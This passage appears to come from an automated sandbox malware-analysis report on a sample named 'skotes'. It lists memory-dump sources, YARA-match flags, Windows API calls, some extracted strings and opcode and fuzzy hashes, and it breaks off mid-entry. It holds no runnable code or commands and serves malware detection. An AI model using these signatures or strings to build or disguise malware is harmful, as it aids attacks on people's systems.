                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: bb7972932e1d79e6c520ae4df9a26e9de137af6bc4f1a6cc6baf320b0341118a
                                                  • Instruction ID: 529448660cd70286f8c56eccca032d01fa0d8de8cbae87382c0c87504df66464
                                                  • Opcode Fuzzy Hash: bb7972932e1d79e6c520ae4df9a26e9de137af6bc4f1a6cc6baf320b0341118a
                                                  • Instruction Fuzzy Hash: 71F0823261522566EF216A769C05A5B775BDF857B0B1D8522FD08A7183DA30EC01D6F0

                                                  Control-flow Graph (graph rendering not reproduced)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S
                                                  • API String ID: 0-543223747
                                                  • Opcode ID: 48d398562ca938e7a7d280e84cba225475ffdd211cfb9bba989cf0d1ce54b4a4
                                                  • Instruction ID: bee0889bd6b8da21d9db3af1773e06fb4bc749d8b8cffe93967975a60ac1f961
                                                  • Opcode Fuzzy Hash: 48d398562ca938e7a7d280e84cba225475ffdd211cfb9bba989cf0d1ce54b4a4
                                                  • Instruction Fuzzy Hash: 5631F6BB14D2A0AEE306C6515A585F77FF9EAC323033444B7F442DB882D2D5590E9332

                                                  Control-flow Graph (graph rendering not reproduced)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S
                                                  • API String ID: 0-543223747
                                                  • Opcode ID: 6e09dd41f8587a47bf1163673bd5a90087c0fdc09e6da21ab5117bd7414ba7a6
                                                  • Instruction ID: e827686804826d22685c0d65fe67c542c60446cac0c5a92f028ac7dfb0256298
                                                  • Opcode Fuzzy Hash: 6e09dd41f8587a47bf1163673bd5a90087c0fdc09e6da21ab5117bd7414ba7a6
                                                  • Instruction Fuzzy Hash: FC11E97B50D2A09EE312C65159685F77BFDE9C373033444BBF441CB497D299190A9332

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: a83ddecbaf3902828a2b7deaa69de54276efea35650a7775f3e1b492282edd1b
                                                  • Instruction ID: 947babc874f07f80f9aafaacbed5773231e6deae8818dd22613e86091969efa8
                                                  • Opcode Fuzzy Hash: a83ddecbaf3902828a2b7deaa69de54276efea35650a7775f3e1b492282edd1b
                                                  • Instruction Fuzzy Hash: F6F0A471A00615EBCB15BB789D03B1EBB74EB06760F804758E825673D5FB705A1487F2

                                                  Control-flow Graph (graph rendering not reproduced)
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7f2881a66ff95bb663feb0d94530b7b5ea0aab313dee7181f64d3437b2a8891f
                                                  • Instruction ID: f5ac0c564a2e1d0314259b5b459ac03c0fbd22034b01dd123fbfe0e3805e2921
                                                  • Opcode Fuzzy Hash: 7f2881a66ff95bb663feb0d94530b7b5ea0aab313dee7181f64d3437b2a8891f
                                                  • Instruction Fuzzy Hash: 45F017FF14C121BD7145C1866B68AFB67EEE1C1B303308827F487C6981D6E45D49A632
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4c9911472f3fb4725e714e025abb63d008ec2d17e3c50b219b6ad8df86e118d
                                                  • Instruction ID: fe6bf68571545782b90ae92d9f6595c48e7983099b6360617e78235d85d81bfd
                                                  • Opcode Fuzzy Hash: a4c9911472f3fb4725e714e025abb63d008ec2d17e3c50b219b6ad8df86e118d
                                                  • Instruction Fuzzy Hash: 62F015FF14C034BC7055C0823B28AFB67AEE0C0A303B08827F446C1881D2D95A4E2672
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5d8d0fc18f6e4867a563e6c7fcfc5bf3c0f28d57214e96fefe6f0ebab5b8118
                                                  • Instruction ID: 467f4550b515e04eb3df03c215d5a8ab236df98923220524e2650a7d4b9bf4c5
                                                  • Opcode Fuzzy Hash: e5d8d0fc18f6e4867a563e6c7fcfc5bf3c0f28d57214e96fefe6f0ebab5b8118
                                                  • Instruction Fuzzy Hash: B0F082BB10C161AEF515C1917E2DBFB67AEE6C17347309927F483C1482D2D5514E5232
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e55d8d920b248ec9644d28f379e6ffe70f1fabe5ec2097c5bb56edb61dfbd1d5
                                                  • Instruction ID: 8749b66b08d8835378fa0610b3eb12f207b631f1519a2dca43ec292b558d364f
                                                  • Opcode Fuzzy Hash: e55d8d920b248ec9644d28f379e6ffe70f1fabe5ec2097c5bb56edb61dfbd1d5
                                                  • Instruction Fuzzy Hash: B3F0C9FF15C135BCB056C5823B28AFB57ADE0D1734370C827F442C1882D6C96A5E6672
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5f85a5ddcd5bd546b3d01ad1e3f9b386383d9ab88daa409532d30efaf0594e2
                                                  • Instruction ID: 45cb70a9fb07257ec8f1347ce39778062dd8792cac48d7752e2e029a9755f91f
                                                  • Opcode Fuzzy Hash: c5f85a5ddcd5bd546b3d01ad1e3f9b386383d9ab88daa409532d30efaf0594e2
                                                  • Instruction Fuzzy Hash: 6CE06DBF10C460AEB052C1827E29AFBA3AEE5D0B307308827F843C2582D2D9154E6132
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 168a9fc28f4538f3773a943bc5029c7bced327a2be61ab581ef1a9f4ed1b56d1
                                                  • Instruction ID: d46b764005183d38b68383c3424d3edc7842f0136f5349411079fef896b0d1c6
                                                  • Opcode Fuzzy Hash: 168a9fc28f4538f3773a943bc5029c7bced327a2be61ab581ef1a9f4ed1b56d1
                                                  • Instruction Fuzzy Hash: 05D02B7644D060EE5151C541E80C9777BF8F681228330449BF58186481D6A41128F372
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                  • API String ID: 0-2571795437
                                                  • Opcode ID: ae4142d44967194096bb55c8932e4e39d0ff93def23a8384e6c3647e67c51957
                                                  • Instruction ID: d7fec8b1ae4b4ad8926e239bde67a2547dfecee12d697c08b94bb1eb6eb4fb56
                                                  • Opcode Fuzzy Hash: ae4142d44967194096bb55c8932e4e39d0ff93def23a8384e6c3647e67c51957
                                                  • Instruction Fuzzy Hash: E082C3709042889BEF14EF68C9497DE7FB5EB05304F508599E809673C2E7759A88CBF2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: bf35bd7ec1f8d96d4bb7911a3cf8b7fc872dc44106fbd25390ea4666dda74f0a
                                                  • Instruction ID: 15260795e3d8da42ab1c4832ef6c2723935a73f89931f00901674ed4563c90bc
                                                  • Opcode Fuzzy Hash: bf35bd7ec1f8d96d4bb7911a3cf8b7fc872dc44106fbd25390ea4666dda74f0a
                                                  • Instruction Fuzzy Hash: A2C24F71E046288FDF25CE28DD407E9B7B6EB89315F1841EAE44DE7240E775AE818F60
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                                  • Instruction ID: dca450b38ae12a5102c2e64589b16aa623bf9edff4baf74195811914f105b945
                                                  • Opcode Fuzzy Hash: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                                  • Instruction Fuzzy Hash: 41F13F71E002199FDF14CFA9C8806ADFBB2FF49314F198269E919A7344D731AE41CBA4
                                                  APIs
                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00D7CF52,?,?,?,?,00D7CF87,?,?,?,?,?,?,00D7C4FD,?,00000001), ref: 00D7CC03
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$FilePreciseSystem
                                                  • String ID:
                                                  • API String ID: 1802150274-0
                                                  • Opcode ID: 4e6760ed1096268db362bf76514f75d1b9618cdbf8bcc199d97c50fc3d30381d
                                                  • Instruction ID: 0055955766ff4464d91b96d46c8f98fb1f7d1bb561ae47a24db7cf6e081a23be
                                                  • Opcode Fuzzy Hash: 4e6760ed1096268db362bf76514f75d1b9618cdbf8bcc199d97c50fc3d30381d
                                                  • Instruction Fuzzy Hash: 58D02232612238EB8B1A2B94FC08CADBBA88B00B603045215ED0D93224CE10EDC08BF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                  • Instruction ID: 352dbbb8e1d4db2af8389c1a48d9e5e4672552d5efa776af032b59d3b33d735a
                                                  • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                  • Instruction Fuzzy Hash: DC516B306187445ADF384E2888967FE679AAF13B00F1C0519E487F7292CE62DD4DA375
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 066cac46bd10752de9288103684a0fdcea2f99404352cad82e6b501f5488259b
                                                  • Instruction ID: 8ede3c8abb72d36ccc170e8b3605047507b2bcb66bf3a153a9ea99ce1db5ebcc
                                                  • Opcode Fuzzy Hash: 066cac46bd10752de9288103684a0fdcea2f99404352cad82e6b501f5488259b
                                                  • Instruction Fuzzy Hash: 142261B3F515144BDB0CCB5DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159644
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57014f049ed541a3c9b167e5716a71940e5b9ff4e298a3cb8128f61d03316137
                                                  • Instruction ID: 8450353da52cf5ac52e2e1df3fbc1143712af35882910919afd95f75895d4622
                                                  • Opcode Fuzzy Hash: 57014f049ed541a3c9b167e5716a71940e5b9ff4e298a3cb8128f61d03316137
                                                  • Instruction Fuzzy Hash: 84B14C31614605DFDB18CF28C886B657BE0FF46364F298658E8D9CF2A1C335E992CB54
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a206d52fa913c7161ed381a9212eedb5bb86cb4ce16f42bf61ad81c88c1232c
                                                  • Instruction ID: 07db605f602e5a45ca9e27ce672efb5e7034e6ddc50fb59ab69096645352c276
                                                  • Opcode Fuzzy Hash: 8a206d52fa913c7161ed381a9212eedb5bb86cb4ce16f42bf61ad81c88c1232c
                                                  • Instruction Fuzzy Hash: 3981EC70E002468FEB15CF68D890BEEBBF5FB1A300F190269D851A7352C7359945CBB0
                                                  APIs
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D624BE
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ___std_exception_copy
                                                  • String ID:
                                                  • API String ID: 2659868963-0
                                                  • Opcode ID: 37439dc5b40f57bf1b736cf311d05dbc0e93d8b415b8bcdd17a904ab299e2eb0
                                                  • Instruction ID: a00c4966379bf15db213c5b30d53e9368b4fb58362b065dfa24f9f5555fc6bb9
                                                  • Opcode Fuzzy Hash: 37439dc5b40f57bf1b736cf311d05dbc0e93d8b415b8bcdd17a904ab299e2eb0
                                                  • Instruction Fuzzy Hash: 9051B0B19057078BDB16CF59D885AADB7F2FF44314F28856AE409EB354E730A940CBB0
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1934eaa9b604135fb573749e9bba6156e948bda675fe0c316d9445e1f307d16d
                                                  • Instruction ID: c102b49a7805406e648664bdbad3fbd2a245feb4cea4d219404cd60b3f9703ca
                                                  • Opcode Fuzzy Hash: 1934eaa9b604135fb573749e9bba6156e948bda675fe0c316d9445e1f307d16d
                                                  • Instruction Fuzzy Hash: 3521B673F20539477B0CC47E8C5227DB6E1C78C541745823AE8A6EA2C1D968D917E2E4
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e146e7752a1a5fba466e7692bc14d52d09031b38eac2f8f99c736f5b3a521545
                                                  • Instruction ID: f9975cf7a799c7bbb08f6934f2bbbf4ac486e6171485de21ca499c60af57a254
                                                  • Opcode Fuzzy Hash: e146e7752a1a5fba466e7692bc14d52d09031b38eac2f8f99c736f5b3a521545
                                                  • Instruction Fuzzy Hash: DA118A33F30C255B675C817D8C1727A95D2DBD825071F533AD826E7384E994DE13D2A0
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 06dd0d8cd24e211fa796af6a337df61c20332efb0f199023be0acbf952db2348
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: ED115B7720118243E604863DF8B85BBE795EBC73217AD437AC8814B748CE2ADC41B620
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c496421388cec9da07444deacb704b0585d776b57ca0de86e1558d874ce58834
                                                  • Instruction ID: ea8b4f2bf39dcbd49747984689da68346d56df998bf363c4e785f8fa9e85aee4
                                                  • Opcode Fuzzy Hash: c496421388cec9da07444deacb704b0585d776b57ca0de86e1558d874ce58834
                                                  • Instruction Fuzzy Hash: DFE0C231001148AFCFA9BB99CC4DE5D3B2AFF01B41F450800FE0886222CB39ED81C7A0
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                  • Instruction ID: ef730016691e79b1537d5fc1d1888c964a115cc7822795fbe007259a05d8dc7e
                                                  • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                  • Instruction Fuzzy Hash: ABE08C32921228EBCB14EFDCD90499AF3ECEB49B10B650096F901D3150C270DE00C7E0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Mtx_unlock$Cnd_broadcast
                                                  • String ID:
                                                  • API String ID: 32384418-0
                                                  • Opcode ID: 120ec380e1901edf9c43373c1396d825634afbae8c5a5abaa1b63a50b0a59d05
                                                  • Instruction ID: c03e3362424558753db1b3492f718260751c8db919c1fdb913ff9d2700481745
                                                  • Opcode Fuzzy Hash: 120ec380e1901edf9c43373c1396d825634afbae8c5a5abaa1b63a50b0a59d05
                                                  • Instruction Fuzzy Hash: E6A1C1B0A017059FDB20DF64C945B6AB7B8FF15314F188129E81AD7691FB35EA08CBB1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
